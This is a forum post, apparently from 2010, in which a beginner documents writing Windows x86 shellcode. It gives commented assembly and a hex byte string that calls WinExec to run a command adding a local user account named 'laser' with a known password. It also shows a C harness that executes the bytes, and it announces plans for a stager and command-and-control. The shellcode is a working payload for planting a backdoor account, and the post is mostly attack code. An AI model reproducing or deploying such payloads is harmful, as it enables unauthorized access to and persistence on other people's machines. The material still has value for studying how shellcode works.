Results 1 to 3 of 3

Thread: My shellcode trail and error diary

Threaded View

  1. #1
    Just burned his ISO
    Join Date
    Jan 2010

    Default My shellcode trail and error diary

    I'm trying to learn how to write shellcode. I'm planning on writing my trails and errors in some type of diary
    and hopefully it can help others.

    The software that I'm using is Borland C++ with CodeBlocks IDE(TASM), Windows Server 2k3

    Using the Winexec function, passing the parmeters of WinExec("cmd.exe /c net user laser laserpass /ADD",0);
    IDA disambly

    asm xor esi ,esi;
    asm push esi;
    asm mov esi ,0x4444412F;	This group of asm is the string "cmd.ex....", writen from the right side to left
    asm push esi;			After move 4 charcters into esi, esi gets loaded onto the stack to be read latter
    asm mov esi ,0x20737361;	We have to take along all the data that the shellcode will need, stopping us from
    asm push esi;			just declareing char string[50] = "cmd...."
    asm mov esi ,0x70726573;
    asm push esi;
    asm mov esi ,0x616C2072;
    asm push esi;
    asm mov esi ,0x6573616C;
    asm push esi;
    asm mov esi ,0x20726573;
    asm push esi;
    asm mov esi ,0x75207465;
    asm push esi;
    asm mov esi ,0x6E20632F;
    asm push esi;
    asm mov esi ,0x20657865;
    asm push esi;
    asm mov esi ,0x2E646D63;
    asm push esi;
    asm mov ecx ,esp;		Place the string directly into the first parm of Winexec(#2), results in it trying
    				to find the instruction or data at the address of string(0x2E646D63) rather than 0012FF7C
    				Copying the stack pointer and moving it into ecx, we well beable to refence it latter
    asm xor eax ,eax;
    asm push eax;   		This part zeros out eax and push it onto the stack at 0012FF78 , for the second parm
    asm mov ebx ,ecx;   		This moves the old stackpointer(above) into ebx and push that as the first parm
    asm push ebx;			0012FF74 dd    12FF7Ch
    asm mov ebx ,0x77ea411e;     	Kernel32 is in all windows programs serach using a disambly the address of WinExec is
    asm call ebx;			at 0x77ea411e . If you create a program that calls WinExec in C the function will show
    				up in the functions table.
    0012FF54 dd    407116h ; __create_lock+62
    0012FF58 dd    40BDB0h ; .data:CriticalSection
    0012FF5C dd    12FF90h ; Stack[00000A48]:retaddr
    0012FF60 dd    406C8Bh ; sub_406C7C+F
    0012FF64 dd    40BD90h ; .data:___exit_lock
    0012FF68 dd    40AC68h ; .data:aCreatingAtexit
    0012FF6C dd    406BA5h ; __init_exit_proc:loc_406BA5
    0012FF70 dd          0
    0012FF74 dd    12FF7Ch
    0012FF78 dd          0
    0012FF7C dd  2E646D63h ; cmd.
    0012FF80 dd    657865h ; exe
    0012FF84 dd    4090DCh ; .data:off_4090DC
    0012FF88 dd  7FFD4000h
    0012FF8C saved_fp dd    12FFB8h ; Stack[00000A48]:saved_fp
    0012FF90 retaddr dd    406E02h ; __startup+172
    0012FF94 argc dd 1
    To test the shellcode a C program like below

    #include <stdio.h>

    main() {

    char scode[] = "\x56\x33\xf6\x56"
    "\xbe\x2f\x41\x44\x44\x56\xbe\x61\x73\x73\x20\x56\ xbe\x73\x65\x72"
    "\x70\x56\xbe\x72\x20\x6c\x61\x56\xbe\x6c\x61\x73\ x65\x56\xbe\x73\x65\x72\x20\x56"
    "\xbe\x65\x74\x20\x75\x56\xbe\x2f\x63\x20\x6e\x56\ xbe\x65\x78\x65\x20\x56\xbe\x63"
    "\x6d\x64\x2e\x56\x33\xf6\x8b\xcc\x33\xc0\x50\x33\ xdb\x8b\xd9\x53\x33\xdb\xbb\x1e"
    "\x41\xea\x77\xff\xd3\x33\xdb\x33\xc0\x33\xc0\x5e\ x5b\x5d\xc3\x90";

    int (*func)();
    func = (int (*)()) scode;

    My next project will be a stager and C&C, so I can pass shellcode above to get executed
    Last edited by pigtail; 01-24-2010 at 11:57 PM. Reason: Readibility edit

Similar Threads

  1. Bt- 4 serieas problem error error
    By lenien in forum Beginners Forum
    Replies: 2
    Last Post: 01-18-2010, 06:52 PM

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts